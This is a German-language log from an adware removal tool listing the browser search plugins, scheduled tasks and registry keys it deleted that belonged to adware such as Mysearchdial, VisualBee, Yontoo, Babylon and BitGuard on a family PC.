Datei Gelöscht : C:\Program Files (x86)\Mozilla Firefox\searchplugins\Babylon.xml

Datei Gelöscht : C:\Users\Papa\AppData\Roaming\Mozilla\Firefox\Profiles\12lc5kq6.default\searchplugins\BrowserProtect.xml

Datei Gelöscht : C:\Users\Papa\AppData\Roaming\Mozilla\Firefox\Profiles\12lc5kq6.default\searchplugins\delta.xml

Datei Gelöscht : C:\Users\Gast\AppData\Roaming\Mozilla\Firefox\Profiles\rqefd106.default\searchplugins\Mysearchdial.xml

Datei Gelöscht : C:\Users\Kenh\AppData\Roaming\Mozilla\Firefox\Profiles\aeqtjz41.default\searchplugins\Mysearchdial.xml

Datei Gelöscht : C:\Users\Papa\AppData\Roaming\Mozilla\Firefox\Profiles\12lc5kq6.default\searchplugins\Mysearchdial.xml

Datei Gelöscht : C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Roaming\Mozilla\Firefox\Profiles\1evgh2ff.default\searchplugins\Mysearchdial.xml

Datei Gelöscht : C:\Users\Papa\AppData\Roaming\Mozilla\Firefox\Profiles\12lc5kq6.default\searchplugins\search.xml

Datei Gelöscht : C:\Users\Papa\AppData\Roaming\Mozilla\Firefox\Profiles\12lc5kq6.default\searchplugins\search-here.xml

Datei Gelöscht : C:\Users\Papa\AppData\Roaming\Mozilla\Firefox\Profiles\12lc5kq6.default\searchplugins\smartbar.xml

Datei Gelöscht : C:\Users\Papa\AppData\Roaming\Mozilla\Firefox\Profiles\12lc5kq6.default\searchplugins\WebSearch.xml

Datei Gelöscht : C:\Users\Gast\AppData\Roaming\Mozilla\Firefox\Profiles\rqefd106.default\user.js

Datei Gelöscht : C:\Users\Kenh\AppData\Roaming\Mozilla\Firefox\Profiles\aeqtjz41.default\user.js

Datei Gelöscht : C:\Users\Papa\AppData\Roaming\Mozilla\Firefox\Profiles\12lc5kq6.default\user.js

Datei Gelöscht : C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Roaming\Mozilla\Firefox\Profiles\1evgh2ff.default\user.js

Datei Gelöscht : C:\Users\Kenh\AppData\Local\Google\Chrome\User Data\Default\bProtector Web Data

Datei Gelöscht : C:\Users\Papa\AppData\Local\Google\Chrome\User Data\Default\bProtector Web Data

Datei Gelöscht : C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Local\Google\Chrome\User Data\Default\bProtector Web Data

Datei Gelöscht : C:\Users\Kenh\AppData\Local\Google\Chrome\User Data\Default\bprotectorpreferences

Datei Gelöscht : C:\Users\Papa\AppData\Local\Google\Chrome\User Data\Default\bprotectorpreferences

Datei Gelöscht : C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Local\Google\Chrome\User Data\Default\bprotectorpreferences

Datei Gelöscht : C:\Users\Papa\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_eooncjejnppfjjklapaamhcdmjbilmde_0.localstorage

Datei Gelöscht : C:\Users\Papa\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_pflphaooapbgpeakohlggbpidpppgdff_0.localstorage

Datei Gelöscht : C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_continuetosave.info_0.localstorage-journal

Datei Gelöscht : C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_www.softonic.de_0.localstorage

Datei Gelöscht : C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_www.softonic.de_0.localstorage-journal

***** [ Tasks ] *****

Task Gelöscht : BackgroundContainer Startup Task

Task Gelöscht : BitGuard

Task Gelöscht : Express FilesUpdate

Task Gelöscht : GoforFilesUpdate

Task Gelöscht : VisualBee-enabler

Task Gelöscht : VisualBee-chromeinstaller

Task Gelöscht : VisualBee-codedownloader

Task Gelöscht : VisualBee-firefoxinstaller

Task Gelöscht : VisualBee-updater

***** [ Verknüpfungen ] *****

***** [ Registrierungsdatenbank ] *****

Schlüssel Gelöscht : HKLM\SOFTWARE\Google\Chrome\Extensions\eooncjejnppfjjklapaamhcdmjbilmde

Schlüssel Gelöscht : HKLM\SOFTWARE\Google\Chrome\Extensions\flcjcajklmlbpmgckpcmnampagbhhmcp

Schlüssel Gelöscht : HKLM\SOFTWARE\Google\Chrome\Extensions\kdidombaedgpfiiedeimiebkmbilgmlc

Schlüssel Gelöscht : HKLM\SOFTWARE\Google\Chrome\Extensions\niapdbllcanepiiimjjndipklodoedlc

Schlüssel Gelöscht : HKLM\SOFTWARE\Google\Chrome\Extensions\nohfdhapjjlndfgjnmdlcabloeembdkj

Schlüssel Gelöscht : HKCU\Software\Google\Chrome\Extensions\pflphaooapbgpeakohlggbpidpppgdff

Schlüssel Gelöscht : HKLM\SOFTWARE\Google\Chrome\Extensions\pflphaooapbgpeakohlggbpidpppgdff

Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Google\Chrome\Extensions\pflphaooapbgpeakohlggbpidpppgdff

Wert Gelöscht : HKCU\Software\Microsoft\Internet Explorer\Main [bprotector start page]

Wert Gelöscht : HKCU\Software\Microsoft\Internet Explorer\SearchScopes [bProtectorDefaultScope]

Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\bProtectSettings

Wert Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Run [BackgroundContainer]

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\AppID\{C26644C4-2A12-4CA6-8F2E-0EDE6CF018F3}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\AppID\DefaultTabBHO.DLL

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\AppID\escort.DLL

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\AppID\escortApp.DLL

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\AppID\escortEng.DLL

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\AppID\escorTlbr.DLL

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\AppID\esrv.EXE

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\AppID\YontooIEClient.DLL

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\b

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\d

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\DefaultTabBHO.DefaultTabBrowser

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\DefaultTabBHO.DefaultTabBrowser.1

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\DefaultTabBHO.DefaultTabBrowserActiveX

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\DefaultTabBHO.DefaultTabBrowserActiveX.1

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\delta.deltaappCore

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\delta.deltaappCore.1

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\delta.deltadskBnd

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\delta.deltadskBnd.1

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\delta.deltaHlpr

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\delta.deltaHlpr.1

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\escort.escortIEPane

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\escort.escortIEPane.1

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\esrv.deltaESrvc

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\esrv.deltaESrvc.1

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\esrv.mysearchdialesrvc

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\esrv.mysearchdialesrvc.1

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\mysearchdial.mysearchdialappCore

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\mysearchdial.mysearchdialappCore.1

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\mysearchdial.mysearchdialdskBnd

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\mysearchdial.mysearchdialdskBnd.1

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\mysearchdial.mysearchdialHlpr

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\mysearchdial.mysearchdialHlpr.1

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Prod.cap

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\protector_dll.protectorbho

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\protector_dll.protectorbho.1

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\speedupmypc

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\YontooIEClient.Api

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\YontooIEClient.Api.1

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\YontooIEClient.Layers

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\YontooIEClient.Layers.1

Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Tracing\BabMaint_RASAPI32

Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Tracing\BabMaint_RASMANCS

Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Tracing\bi_client_RASAPI32

Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Tracing\bi_client_RASMANCS

Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Tracing\GoforFiles_RASAPI32

Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Tracing\GoforFiles_RASMANCS

Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Tracing\LatestDLMgr_RASAPI32

Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Tracing\LatestDLMgr_RASMANCS

Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Tracing\Mobogenie_RASAPI32

Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Tracing\Mobogenie_RASMANCS

Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Tracing\MyBabylontb_RASAPI32

Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Tracing\MyBabylontb_RASMANCS

Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Tracing\MYSEAR~1_RASAPI32

Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Tracing\MYSEAR~1_RASMANCS

Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Tracing\MySearchDial_RASAPI32

Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Tracing\MySearchDial_RASMANCS

Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Tracing\optprostart_rasapi32

Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Tracing\optprostart_rasmancs

Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Tracing\privitizevpn_1_rasapi32

Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Tracing\privitizevpn_1_rasmancs

Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Tracing\UpdateTask_RASAPI32

Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Tracing\UpdateTask_RASMANCS

Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Tracing\uTorrentBar_DEAutoUpdateHelper_RASAPI32

Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Tracing\uTorrentBar_DEAutoUpdateHelper_RASMANCS

Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Tracing\YontooDesktop_RASAPI32

Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Tracing\YontooDesktop_RASMANCS

Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BonanzaDealsLive.exe

Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\MobogenieAdd

Schlüssel Gelöscht : HKCU\Software\5f2d9dde235ec14

Schlüssel Gelöscht : HKLM\SOFTWARE\5f2d9dde235ec14

Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SP_19703871

Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SP_4e24eecb

Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SP_703c874a

Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SP_e14dcdfa

Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SP_eea72b4f

Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SP_f5d3e0aa

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CrossriderApp0033906.BHO

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CrossriderApp0033906.BHO.1

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CrossriderApp0033906.Sandbox

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CrossriderApp0033906.Sandbox.1

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Toolbar.CT2851647

Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Tracing\SoftonicDownloader_for_call-of-duty-2_RASAPI32

Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Tracing\SoftonicDownloader_for_call-of-duty-2_RASMANCS

Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Tracing\SoftonicDownloader_for_grand-theft-auto-san-andreas_RASAPI32

Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Tracing\SoftonicDownloader_for_grand-theft-auto-san-andreas_RASMANCS

Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Tracing\SoftonicDownloader_fuer_ipadian_RASAPI32

Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Tracing\SoftonicDownloader_fuer_ipadian_RASMANCS

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\AppID\{09C554C3-109B-483C-A06B-F14172F1A947}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\AppID\{38495740-0035-4471-851E-F5BBB86AB085}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\AppID\{39CB8175-E224-4446-8746-00566302DF8D}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\AppID\{4E1E9D45-8BF9-4139-915C-9F83CC3D5921}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\AppID\{72D89EBF-0C5D-4190-91FD-398E45F1D007}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\AppID\{B12E99ED-69BD-437C-86BE-C862B9E5444D}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\AppID\{C292AD0A-C11F-479B-B8DB-743E72D283B0}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\AppID\{CA5CAA63-B27C-4963-9BEC-CB16A36D56F8}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\AppID\{CFDAFE39-20CE-451D-BD45-A37452F39CF0}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\AppID\{D7EE8177-D51E-4F89-92B6-83EA2EC40800}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{02478D38-C3F9-4EFB-9B51-7695ECA05670}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{058F0E48-61CA-4964-9FBA-1978A1BB060D}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{059EACC2-1ABE-49E8-928D-DC8BD355B7A9}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{0CFBE80D-5608-4309-A0F5-3B1414833432}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{10DE7085-6A1E-4D41-A7BF-9AF93E351401}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{18F33C35-8EF2-40D7-8BA4-932B0121B472}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{261DD098-8A3E-43D4-87AA-63324FA897D8}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{3004627E-F8E9-4E8B-909D-316753CBA923}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{3C471948-F874-49F5-B338-4F214A2EE0B1}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{4ED063C9-4A0B-4B44-A9DC-23AFF424A0D3}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{4FCB4630-2A1C-4AA1-B422-345E8DC8A6DE}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{539F76FD-084E-4858-86D5-62F02F54AE86}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{60EACC1A-33FA-443D-9846-17B28E2C9BDB}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{7E84186E-B5DE-4226-8A66-6E49C6B511B4}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{7F6AFBF1-E065-4627-A2FD-810366367D01}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{80922EE0-8A76-46AE-95D5-BD3C3FE0708D}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{82E1477C-B154-48D3-9891-33D83C26BCD3}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{86838207-681D-469D-9511-D0DCC6F19F9B}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{99066096-8989-4612-841F-621A01D54AD7}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{A1E28287-1A31-4B0F-8D05-AA8C465D3C5A}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{AA74D58F-ACD0-450D-A85E-6C04B171C044}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{AAA38851-3CFF-475F-B5E0-720D3645E4A5}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{C1AF5FA5-852C-4C90-812E-A7F75E011D87}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{C358B3D0-B911-41E3-A276-E7D43A6BA56D}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{D40753C7-8A59-4C1F-BE88-C300F4624D5B}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{DF7770F7-832F-4BDF-B144-100EDDD0C3AE}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{E97A663B-81A6-49C5-A6D3-BCB05BA1DE26}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{EF5625A3-37AB-4BDB-9875-2A3D91CD0DFD}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{EF99BD32-C1FB-11D2-892F-0090271D4F88}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{FD72061E-9FDE-484D-A58A-0BAB4151CAD8}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{FE9271F2-6EFD-44B0-A826-84C829536E93}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{B92742C8-903F-6740-0B5A-F4F00ABBBCAC}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{11111111-1111-1111-1111-110311391106}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{22222222-2222-2222-2222-220322392206}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{0400EBCA-042C-4000-AA89-9713FBEDB671}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{06E50566-0AB7-431C-841D-62794727DAF9}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{0BD19251-4B4B-4B94-AB16-617106245BB7}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{10DE7085-6A1E-4D41-A7BF-9AF93E351401}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{1231839B-064E-4788-B865-465A1B5266FD}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{1AD27395-1659-4DFF-A319-2CFA243861A5}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{1F8EDE97-36D5-422A-B8F0-9406E2D87C60}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{26E7211D-0650-43CF-8498-4C81E83AEAAA}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{2DAC2231-CC35-482B-97C5-CED1D4185080}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{31E3BC75-2A09-4CFF-9C92-8D0ED8D1DC0F}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{3281114F-BCAB-45E3-80D9-A6CD64D4E636}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{3F1CD84C-04A3-4EA0-9EA1-7D134FD66C82}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{3F83A9CA-B5F0-44EC-9357-35BB3E84B07F}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{44533FCB-F9FB-436A-8B6B-CF637B2D465A}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{44B29DDD-CF7A-454A-A275-A322A398D93F}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{47E520EA-CAD2-4F51-8F30-613B3A1C33EB}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{57C91446-8D81-4156-A70E-624551442DE9}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{70AFB7B2-9FB5-4A70-905B-0E9576142E1D}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{7AD65FD1-79E0-406D-B03C-DD7C14726D69}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{97DD820D-2E20-40AD-B01E-6730B2FCE630}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{9EDC0C90-2B5B-4512-953E-35767BAD5C67}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{A4DE94DB-DF03-45A3-8A5D-D1B7464B242D}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{AA0F50A8-2618-4AE4-A779-9F7378555A8F}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{B177446D-54A4-4869-BABC-8566110B4BE0}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{B2DB115C-8278-4947-9A07-57B53D1C4215}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{B97FC455-DB33-431D-84DB-6F1514110BD5}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{C66F0B7A-BD67-4982-AF71-C6CA6E7F016F}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{C67281E0-78F5-4E49-9FAE-4B1B2ADAF17B}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{D54C859C-6066-4F31-8FE0-2AAEDCAE67D7}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{D9D1DFC5-502D-43E4-B1BB-4D0B7841489A}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{E0B07188-A528-4F9E-B2F7-C7FDE8680AE4}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{E72E9312-0367-4216-BFC7-21485FA8390B}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{F05B12E1-ADE8-4485-B45B-898748B53C37}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{F6CCB6C9-127E-44AE-8552-B94356F39FFE}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{FFD25630-2734-4AE9-88E6-21BF6525F3FE}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{55555555-5555-5555-5555-550355395506}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{66666666-6666-6666-6666-660366396606}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\TypeLib\{39CB8175-E224-4446-8746-00566302DF8D}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\TypeLib\{4599D05A-D545-4069-BB42-5895B4EAE05B}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\TypeLib\{4E1E9D45-8BF9-4139-915C-9F83CC3D5921}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\TypeLib\{C292AD0A-C11F-479B-B8DB-743E72D283B0}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\TypeLib\{D372567D-67C1-4B29-B3F0-159B52B3E967}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\TypeLib\{D7EE8177-D51E-4F89-92B6-83EA2EC40800}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\TypeLib\{E2343056-CC08-46AC-B898-BFC7ACF4E755}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\TypeLib\{F13D3582-1359-4F8F-9A48-EF3AE9F5701C}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\TypeLib\{FBC322D5-407E-4854-8C0B-555B951FD8E3}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\TypeLib\{FEB62B15-CC00-4736-AAEC-BA046C9DFF73}

Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{02478D38-C3F9-4EFB-9B51-7695ECA05670}

Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{7F6AFBF1-E065-4627-A2FD-810366367D01}

Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{AA74D58F-ACD0-450D-A85E-6C04B171C044}

Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{C1AF5FA5-852C-4C90-812E-A7F75E011D87}

Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{EF5625A3-37AB-4BDB-9875-2A3D91CD0DFD}

Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{FD72061E-9FDE-484D-A58A-0BAB4151CAD8}

Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{B92742C8-903F-6740-0B5A-F4F00ABBBCAC}

Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110311391106}

Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{02478D38-C3F9-4EFB-9B51-7695ECA05670}

Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{0CFBE80D-5608-4309-A0F5-3B1414833432}

Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{3004627E-F8E9-4E8B-909D-316753CBA923}

Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{7F6AFBF1-E065-4627-A2FD-810366367D01}

Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{82E1477C-B154-48D3-9891-33D83C26BCD3}

Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{A1E28287-1A31-4B0F-8D05-AA8C465D3C5A}

Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{AA74D58F-ACD0-450D-A85E-6C04B171C044}

Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{C1AF5FA5-852C-4C90-812E-A7F75E011D87}

Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{EF5625A3-37AB-4BDB-9875-2A3D91CD0DFD}

Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{EF99BD32-C1FB-11D2-892F-0090271D4F88}

Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{FD72061E-9FDE-484D-A58A-0BAB4151CAD8}

Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{FE063412-BEA4-4D76-8ED3-183BE6220D17}

Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B92742C8-903F-6740-0B5A-F4F00ABBBCAC}

Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{11111111-1111-1111-1111-110311391106}

Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{02478D38-C3F9-4EFB-9B51-7695ECA05670}

Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{0CFBE80D-5608-4309-A0F5-3B1414833432}

Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{3004627E-F8E9-4E8B-909D-316753CBA923}

Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{7F6AFBF1-E065-4627-A2FD-810366367D01}

Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{82E1477C-B154-48D3-9891-33D83C26BCD3}

